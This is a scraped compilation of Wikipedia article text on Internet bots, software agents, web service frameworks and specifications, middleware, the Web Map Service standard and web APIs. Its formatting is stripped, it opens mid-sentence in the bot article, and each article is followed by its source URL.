adenial-of-service attackby abotnet. Internet bots or web bots can also be used to commitclick fraudand more recently have appeared aroundMMORPGgames ascomputer game bots. Another category is represented byspambots, internet bots that attempt tospamlarge amounts of content on the Internet, usually adding advertising links. More than 94.2% of websites have experienced a bot attack.[3] There are malicious bots (andbotnets) of the following types: in 2012, journalist Percy von Lipinski reported that he discovered millions of bots or botted or pinged views at CNNiReport.CNNiReport quietly removed millions of views from the account of iReporter Chris Morrow.[19]It is not known if the ad revenue received by CNN from the fake views was ever returned to the advertisers.[citation needed] The most widely used anti-bot technique isCAPTCHA. Examples of providers includeRecaptcha, Minteye,Solve Mediaand NuCaptcha. However, captchas are not foolproof in preventing bots, as they can often becircumventedby computer character recognition, security holes, and outsourcing captcha solving to cheap laborers.[citation needed] In the case of academic surveys, protection against auto test taking bots is essential for maintaining accuracy and consistency in the results of the survey. Without proper precautions against these bots, the results of a survey can become skewed or inaccurate. Researchers indicate that the best way to keep bots out of surveys is to not allow them to enter to begin with. The survey should have participants from a reliable source, such as an existing department or group at work. This way, malicious bots don't have the opportunity to infiltrate the study. Another form of protection against bots is a CAPTCHA test as mentioned in a previous section, which stands for "Completely Automated Public Turing Test".  This test is often used to quickly distinguish a real user from a bot by posing a challenge that a human could easily do but a bot would not.  This could be something like recognizing distorted letters or numbers, or picking out specific parts of an image, such as traffic lights on a busy street. CAPTCHAs are a great form of protection due to their ability to be completed quickly, low effort, and easy implementation. There are also dedicated companies that specialize in protection against bots, including ones like DataDome, Akamai and Imperva.  These companies offer defense systems to their clients to protect them against DDoS attacks, infrastructure attacks, and overall cybersecurity.  While the pricing rates of these companies can often be expensive, the services offered can be crucial both for large corporations and small businesses. There are two main concerns with bots: clarity and face-to-face support. The cultural background of human beings affects the way they communicate with social bots.[citation needed]Others recognize that online bots have the ability to "masquerade" as humans online and have become highly aware of their presence. Due to this, some users are becoming unsure when interacting with a social bot. Many people believe that bots are vastly less intelligent than humans, so they are not worthy of our respect.[2] Min-Sun Kim proposed five concerns or issues that may arise when communicating with a social robot, and they are avoiding the damage of peoples' feelings, minimizing impositions, disapproval from others, clarity issues, and how effective their messages may come across.[2] People who oppose social robots argue that they also take away from the genuine creations of human relationships.[2]Opposition to social bots also note that the use of social bots add a new, unnecessary layer to privacy protection. Many users call for stricter legislation in relation to social bots to ensure private information remains preserved. The discussion of what to do with social bots and how far they should go remains ongoing. In recent years, political discussion platforms and politics on social media have become highly unstable and volatile. With the introduction of social bots on the political discussion scene, many users worry about their effect on the discussion and election outcomes. The biggest offender on the social media side is X (previously Twitter), where heated political discussions are raised both by bots and real users. The result is a misuse of political discussion on these platforms and a general mistrust among users for what they see.[citation needed]
https://en.wikipedia.org/wiki/Internet_bot
Incomputer science, asoftware agentis a computer program that acts for a user or another program in a relationship of agency. The termagentis derived from theLatinagere(to do): an agreement to act on one's behalf. Such "action on behalf of" implies theauthorityto decide which, if any, action is appropriate.[1][2]Some agents are colloquially known asbots, fromrobot. They may be embodied, as when execution is paired with a robot body, or assoftwaresuch as a chatbot executing on acomputer, such as amobile device, e.g.Siri. Software agents may be autonomous or work together with other agents or people. Software agents interacting with people (e.g.chatbots,human-robot interactionenvironments) may possess human-like qualities such asnatural language understandingand speech, personality or embody humanoid form (seeAsimo). Related and derived concepts includeintelligent agents(in particular exhibiting some aspects ofartificial intelligence, such asreasoning),autonomous agents(capable of modifying the methods of achieving their objectives),distributedagents (being executed on physically distinct computers),multi-agent systems(distributed agents that work together to achieve an objective that could not be accomplished by a single agent acting alone), andmobile agents(agents that can relocate their execution onto different processors). The basic attributes of an autonomous software agent are that agents: The concept of an agent provides a convenient and powerful way to describe a complex software entity that is capable of acting with a certain degree ofautonomyin order to accomplish tasks on behalf of its host. But unlike objects, which are defined in terms ofmethodsandattributes, an agent is defined in terms of its behavior.[3] Various authors have proposed different definitions of agents, these commonly include concepts such as: All agents are programs, but not all programs are agents. Contrasting the term with related concepts may help clarify its meaning. Franklin & Graesser (1997)[4]discuss four key notions that distinguish agents from arbitrary programs: reaction to the environment, autonomy, goal-orientation andpersistence. Software agents may offer various benefits to their end users by automating complex or repetitive tasks.[6]However, there are organizational and cultural impacts of this technology that need to be considered prior to implementing software agents. People like to perform easy tasks providing the sensation of success unless the repetition of the simple tasking is affecting the overall output. In general implementing software agents to perform administrative requirements provides a substantial increase in work contentment, as administering their own work does never please the worker. The effort freed up serves for a higher degree of engagement in the substantial tasks of individual work. Hence, software agents may provide the basics to implement self-controlled work, relieved from hierarchical controls and interference.[7]Such conditions may be secured by application of software agents for required formal support. The cultural effects of the implementation of software agents include trust affliction, skills erosion, privacy attrition and social detachment. Some users may not feel entirely comfortable fully delegating important tasks to software applications. Those who start relying solely on intelligent agents may lose important skills, for example, relating to information literacy. In order to act on a user's behalf, a software agent needs to have a complete understanding of a user's profile, including his/her personal preferences. This, in turn, may lead to unpredictable privacy issues. When users start relying on their software agents more, especially for communication activities, they may lose contact with other human users and look at the world with the eyes of their agents. These consequences are what agent researchers and users must consider when dealing with intelligent agent technologies.[8] The concept of an agent can be traced back toHewitt's Actor Model(Hewitt, 1977) - "A self-contained, interactive and concurrently-executing object, possessing internal state and communication capability."[citation needed] To be more academic, software agent systems are a direct evolution of Multi-Agent Systems (MAS). MAS evolved fromDistributed Artificial Intelligence(DAI), Distributed Problem Solving (DPS) and Parallel AI (PAI), thus inheriting all characteristics (good and bad) from DAI andAI. John Sculley's 1987 "Knowledge Navigator" video portrayed an image of a relationship between end-users and agents. Being an ideal first, this field experienced a series of unsuccessful top-down implementations, instead of a piece-by-piece, bottom-up approach. The range of agent types is now (from 1990) broad: WWW, search engines, etc. Buyer agents[9]travel around a network (e.g. the internet) retrieving information about goods and services. These agents, also known as 'shopping bots', work very efficiently for commodity products such as CDs, books, electronic components, and other one-size-fits-all products. Buyer agents are typically optimized to allow for digital payment services used in e-commerce and traditional businesses.[10] User agents, or personal agents, are intelligent agents that take action on your behalf. In this category belong those intelligent agents that already perform, or will shortly perform, the following tasks: Monitoring and surveillance agentsare used to observe and report on equipment, usually computer systems. The agents may keep track of company inventory levels, observe competitors' prices and relay them back to the company, watchstock manipulationbyinsider tradingand rumors, etc. For example, NASA's Jet Propulsion Laboratory has an agent that monitors inventory, planning, schedules equipment orders to keep costs down, and manages food storage facilities. These agents usually monitor complex computer networks that can keep track of the configuration of each computer connected to the network. A special case of Monitoring-and-Surveillance agents are organizations of agents used to emulate the Human Decision-Making process during tactical operations. The agents monitor the status of assets (ammunition, weapons available, platforms for transport, etc.) and receive Goals (Missions) from higher level agents. The Agents then pursue the Goals with the Assets at hand, minimizing expenditure of the Assets while maximizing Goal Attainment. (See Popplewell, "Agents and Applicability") This agent uses information technology to find trends and patterns in an abundance of information from many different sources. The user can sort through this information in order to find whatever information they are seeking. A data mining agent operates in a data warehouse discovering information. A 'data warehouse' brings together information from many different sources. "Data mining" is the process of looking through the data warehouse to find information that you can use to take action, such as ways to increase sales or keep customers who are considering defecting. 'Classification' is one of the most common types of data mining, which finds patterns in information and categorizes them into different classes. Data mining agents can also detect major shifts in trends or a key indicator and can detect the presence of new information and alert you to it. For example, the agent may detect a decline in the construction industry for an economy; based on this relayed information construction companies will be able to make intelligent decisions regarding the hiring/firing of employees or the purchase/lease of equipment in order to best suit their firm. Some other examples of currentintelligent agentsinclude somespamfilters, gamebots, and server monitoring tools.Search engine indexingbots also qualify as intelligent agents. Software bots are becoming important in software engineering.[12] Agents are also used in software security application to intercept, examine and act on various types of content. Example include: Issues to consider in the development of agent-based systems include For software agents to work together efficiently they must sharesemanticsof their data elements. This can be done by having computer systems publish theirmetadata. The definition ofagent processingcan be approached from two interrelated directions: Agent systems are used to model real-world systems withconcurrencyor parallel processing. The agent uses its access methods to go out into local and remote databases to forage for content. These access methods may include setting up news stream delivery to the agent, or retrieval from bulletin boards, or using a spider to walk the Web. The content that is retrieved in this way is probably already partially filtered – by the selection of the newsfeed or the databases that are searched. The agent next may use its detailed searching or language-processing machinery to extract keywords or signatures from the body of the content that has been received or retrieved. This abstracted content (or event) is then passed to the agent's Reasoning or inferencing machinery in order to decide what to do with the new content. This process combines the event content with the rule-based or knowledge content provided by the user. If this process finds a good hit or match in the new content, the agent may use another piece of its machinery to do a more detailed search on the content. Finally, the agent may decide to take an action based on the new content; for example, to notify the user that an important event has occurred. This action is verified by a security function and then given the authority of the user. The agent makes use of a user-access method to deliver that message to the user. If the user confirms that the event is important by acting quickly on the notification, the agent may also employ its learning machinery to increase its weighting for this kind of event. Bots can act on behalf of their creators to do good as well as bad. There are a few ways which bots can be created to demonstrate that they are designed with the best intention and are not built to do harm. This is first done by having a bot identify itself in the user-agent HTTP header when communicating with a site. The source IP address must also be validated to establish itself as legitimate. Next, the bot must also always respect a site's robots.txt file since it has become the standard across most of the web. And like respecting the robots.txt file, bots should shy away from being too aggressive and respect any crawl delay instructions.[14]
https://en.wikipedia.org/wiki/Software_agent
Alist of web service frameworks:
https://en.wikipedia.org/wiki/List_of_web_service_frameworks
The following is a list ofweb serviceprotocols.
https://en.wikipedia.org/wiki/List_of_web_service_protocols
There are a variety of specifications associated withweb services. These specifications are in varying degrees of maturity and are maintained or supported by various standards bodies and entities. These specifications are the basic web services framework established byfirst-generationstandards represented byWSDL,SOAP, andUDDI.[1]Specifications may complement, overlap, and compete with each other. Web service specifications are occasionally referred to collectively as "WS-*", though there is not a single managed set of specifications that this consistently refers to, nor a recognized owning body across them all. These sites contain documents and links about the differentWeb servicesstandards identified on this page. These specifications provide additional information to improve interoperability between vendor implementations.
https://en.wikipedia.org/wiki/List_of_web_service_specifications
Middlewareis a type ofcomputer softwareprogram that provides services to software applications beyond those available from theoperating system. It can be described as "software glue".[1][2] Middleware makes it easier forsoftware developersto implement communication and input/output, so they can focus on the specific purpose of their application. It gained popularity in the 1980s as a solution to the problem of how to link newer applications to older legacy systems, although the term had been in use since 1968.[3] The term is most commonly used for software that enables communication and management of data indistributed applications. AnIETFworkshop in 2000 defined middleware as "those services found above thetransport(i.e. over TCP/IP) layer set of services but below the application environment" (i.e. below application-levelAPIs).[citation needed]In this more specific sensemiddlewarecan be described as the hyphen ("-") inclient-server, or the-to-inpeer-to-peer. Middleware includesweb servers,application servers,content management systems, and similar tools that support application development and delivery.[4] ObjectWeb defines middleware as: "The software layer that lies between theoperating systemand applications on each side of a distributed computing system in a network."[5]Services that can be regarded as middleware includeenterprise application integration,data integration,message oriented middleware(MOM),object request brokers(ORBs), and theenterprise service bus(ESB).[6] Databaseaccess services are often characterised as middleware. Some of them are language specific implementations and support heterogeneous features and other related communication features.[7]Examples of database-oriented middleware includeODBC,JDBC, andtransaction processingmonitors.[8] Distributed computing system middleware can loosely be divided into two categories—those that provide human-time services (such as web request servicing) and those that perform in machine-time. This latter middleware is somewhat standardized through theService Availability Forum[9]and is commonly used in complex,embedded systemswithin the telecom, defence, andaerospaceindustries.[10] Many categories of middleware have been defined, based on the field in which it is used or the application module it serves. A recent bibliography identified the main categories of middleware as follows:[11] The termmiddlewareis used in other contexts as well.Middlewareis sometimes used in a similar sense to asoftware driver, an abstraction layer that hides detail about hardware devices or other software from an application.
https://en.wikipedia.org/wiki/Middleware
AWeb Map Service(WMS) is a standard protocol developed by theOpen Geospatial Consortiumin 1999 for servinggeoreferencedmap images over the Internet.[1]These images are typically produced by amap serverfrom data provided by aGISdatabase.[3] TheOpen Geospatial Consortium(OGC) became involved in developing standards for web mapping after a paper was published in 1997 by Allan Doyle, outlining a "WWW Mapping Framework".[4]The OGC established a task force to come up with a strategy,[5]and organized the "Web Mapping Testbed" initiative, inviting pilot web mapping projects that built upon ideas by Doyle and the OGC task force. Results of the pilot projects were demonstrated in September 1999, and a second phase of pilot projects ended in April 2000.[6] The Open Geospatial Consortium released WMS version 1.0.0 in April 2000,[7]followed by version 1.1.0 in June 2001,[8]and version 1.1.1 in January 2002.[9]The OGC released WMS version 1.3.0 in January 2004.[10] WMS specifies a number of different request types, two of which are required by any WMS server:[11] Request types that WMS providers may optionally support include: All communication is served throughHTTP. A WMS server usually serves the map in abitmapformat, e.g. PNG, GIF, JPEG, etc. In addition,vector graphicscan be included, such as points, lines, curves and text, expressed inSVGorWebCGMformat. Open sourcesoftwarethat provide web map services capability include: Proprietary server software that allow providing web map services include: Open source standalone (client side) software that allow viewing web map services include: Proprietary standalone (client side) software that allow viewing web map services include: WMS is a widely supported format for maps and GIS data accessed via the Internet and loaded into client side GIS software. Major commercial GIS and mapping software that support WMS include: Open source software that supports WMS include:
https://en.wikipedia.org/wiki/Web_Map_Service
Aweb APIis anapplication programming interface(API) for either aweb serveror aweb browser. As aweb developmentconcept, it can be related to aweb application'sclient side(including anyweb frameworksbeing used). Aserver-sideweb API consists of one or more publicly exposedendpointsto a definedrequest–responsemessage system, typically expressed inJSONorXMLby means of anHTTP-basedweb server. Aserver API(SAPI) is not considered a server-side web API, unless it is publicly accessible by a remote web application. Aclient-sideweb API is a programmatic interface to extend functionality within aweb browseror other HTTP client. Originally these were most commonly in the form of nativeplug-inbrowser extensionshowever most newer ones target standardizedJavaScriptbindings. TheMozilla Foundationcreated their WebAPI specification which is designed to help replace native mobile applications withHTML5applications.[1][2] Googlecreated theirNative Clientarchitecture which is designed to help replace insecure native plug-ins with secure nativesandboxedextensions and applications. They have also made this portable by employing a modifiedLLVMAOT compiler. Aserver-sideweb API consists of one or more publicly exposedendpointsto a definedrequest–responsemessage system, typically expressed inJSONorXML. The web API is exposed most commonly by means of anHTTP-basedweb server. Mashupsareweb applicationswhich combine the use of multiple server-side web APIs.[3][4][5]Webhooksare server-side web APIs that take input as aUniform Resource Identifier(URI) that is designed to be used like a remotenamed pipeor a type ofcallbacksuch that the server acts as a client to dereference the provided URI and trigger an event on another server which handles this event thus providing a type of peer-to-peerIPC. Endpointsare important aspects of interacting with server-side web APIs, as they specify where resources lie that can be accessed by third party software. Usually the access is via a URI to which HTTP requests are posted, and from which the response is thus expected. Web APIs may be public or private, the latter of which requires anaccess token.[6] Endpoints need to be static, otherwise the correct functioning of software that interacts with them cannot be guaranteed. If the location of a resource changes (and with it the endpoint) then previously written software will break, as the required resource can no longer be found at the same place. As API providers still want to update their web APIs, many have introduced a versioning system in the URI that points to an endpoint. Web 2.0Web APIs often use machine-based interactions such asRESTandSOAP. RESTful web APIs useHTTPmethods to access resources via URL-encoded parameters, and useJSONorXMLto transmit data. By contrast,SOAPprotocols are standardized by theW3Cand mandate the use ofXMLas the payload format, typically overHTTP. Furthermore,SOAP-based Web APIs useXML validationto ensure structural message integrity, by leveraging theXML schemasprovisioned withWSDLdocuments. AWSDLdocument accurately defines the XML messages and transport bindings of aWeb service. Server-side web APIs are interfaces for the outside world to interact with the business logic. For many companies this internal business logic and the intellectual property associated with it are what distinguishes them from other companies, and potentially what gives them a competitive edge. They do not want this information to be exposed. However, in order to provide a web API of high quality, thereneedsto be a sufficient level of documentation. One API provider that not only provides documentation, but also links to it in its error messages isTwilio.[7] However, there are now directories of popular documented server-side web APIs.[8] The number of available web APIs has grown consistently over the past years, as businesses realize the growth opportunities associated with running an open platform, that any developer can interact with.ProgrammableWebtracks over 24000 Web APIs that were available in 2022, up from 105 in 2005. Web APIs have become ubiquitous. There are few major software applications/services that do not offer some form of web API. One of the most common forms of interacting with these web APIs is via embedding external resources, such as tweets, Facebook comments, YouTube videos, etc. In fact there are very successful companies, such asDisqus, whose main service is to provide embeddable tools, such as a feature-rich comment system.[9]Any website of the TOP 100Alexa Internetranked websites uses APIs and/or provides its own APIs, which is a very distinct indicator for the prodigious scale and impact of web APIs as a whole.[10] As the number of available web APIs has grown, open source tools have been developed to provide more sophisticated search and discovery. APIs.json provides a machine-readable description of an API and its operations, and the related project APIs.io offers a searchable public listing of APIs based on the APIs.json metadata format.[11][12] Many companies and organizations rely heavily on their Web API infrastructure to serve their core business clients. In 2014Netflixreceived around 5 billion API requests, most of them within their private API.[13] Many governments collect a lot of data, and some governments are now opening up access to this data. The interfaces through which this data is typically made accessible are web APIs. Web APIs allow for data, such as "budget, public works, crime, legal, and other agency data"[14]to be accessed by any developer in a convenient manner. An example of a popular web API is theAstronomy Picture of the DayAPI operated by the American space agencyNASA. It is a server-side API used to retrieve photographs of space or other images of interest toastronomers, andmetadataabout the images. According to the API documentation,[15]the API has one endpoint: The documentation states that this endpoint acceptsGET requests. It requires one piece of information from the user, anAPI key, and accepts several other optional pieces of information. Such pieces of information are known asparameters. The parameters for this API are written in a format known as aquery string, which is separated by aquestion markcharacter (?) from the endpoint. Anampersand(&) separates the parameters in the query string from each other. Together, the endpoint and the query string form aURLthat determines how the API will respond. This URL is also known as aqueryor anAPI call. In the below example, two parameters are transmitted (orpassed) to the API via the query string. The first is the required API key and the second is an optional parameter — the date of the photograph requested. Visiting the above URL in a web browser will initiate a GET request, calling the API and showing the user a result, known as areturn valueor as areturn. This API returnsJSON, a type of data format intended to be understood by computers, but which is somewhat easy for a human to read as well. In this case, the JSON contains information about a photograph of awhite dwarf star: The above API return has been reformatted so that names of JSON data items, known askeys, appear at the start of each line. The last of these keys, namedurl, indicates a URL which points to a photograph: Following the above URL, a web browser user would see this photo: Although this API can be called by anend userwith a web browser (as in this example) it is intended to be called automatically by software or by computer programmers while writing software. JSON is intended to beparsedby a computer program, which would extract the URL of the photograph and the other metadata. The resulting photo could be embedded in a website, automatically sent via text message, or used for any other purpose envisioned by a software developer.
https://en.wikipedia.org/wiki/Web_API